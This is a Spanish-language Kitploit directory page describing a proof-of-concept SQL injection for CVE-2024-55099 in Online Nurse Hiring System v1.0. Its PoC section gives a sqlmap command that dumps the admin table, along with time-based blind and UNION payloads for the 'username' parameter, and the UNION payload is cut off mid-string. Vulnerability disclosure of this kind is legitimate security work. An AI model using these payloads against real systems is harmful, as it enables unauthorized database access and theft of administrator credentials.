Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability- — Exploit de prueba de concepto para CVE-2024-55099, que demuestra inyección SQL en Online Nurse Hiring System v1.0 a través del parámetro de nombre de usuario sin sanitizar, permitiendo enumeración de bases de datos y omisión de autenticación. | Kitploit
Herramientas/GitHubGitHub/ugurkarakoc1/cve-2024-55099-online-nurse-hiring-system-v1.0-sql-injection-vulnerability-
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónArchived
GitHubugurkarakoc1/cve-2024-55099-online-nurse-hiring-system-v1.0-sql-injection-vulnerability-

CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability-

Exploit de prueba de concepto para CVE-2024-55099, que demuestra inyección SQL en Online Nurse Hiring System v1.0 a través del parámetro de nombre de usuario sin sanitizar, permitiendo enumeración de bases de datos y omisión de autenticación.

Ver Repositorio
11hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-Vulnerabilidad-de-Inyección-SQL

  • Autor del exploit: ugurkarakoc

Página del proveedor

  • https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql

Enlace del software

  • https://phpgurukul.com/?sdm_process_download=1&download_id=17826

Resumen

  • Online-Nurse-Hiring-System-v1.0 presenta una validación y saneamiento insuficientes de los parámetros 'username', lo que puede crear una vulnerabilidad a ataques de inyección SQL, permitiendo el acceso no autorizado a la base de datos y comprometiendo la seguridad del sistema.

Detalles de la vulnerabilidad

  • CVE ID: CVE-2024-55099
  • Versión afectada: Online-Nurse-Hiring-System-v1.0
  • Archivo vulnerable: /admin/index.php.
  • Nombres de los parámetros: username
  • Tipo de ataque: Local

Referencias:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55099
  • https://nvd.nist.gov/vuln/detail/CVE-2024-55099

Descripción

  • La falta de una validación y saneamiento adecuados de los parámetros 'username' permite a un atacante elaborar consultas de inyección SQL, evadiendo los mecanismos de autenticación y obteniendo acceso no autorizado a la base de datos.

Prueba de concepto (PoC) :

  • sqlmap -r r.txt -dbs --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump
root@kitploit:~
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e
---

image

Descargar herramienta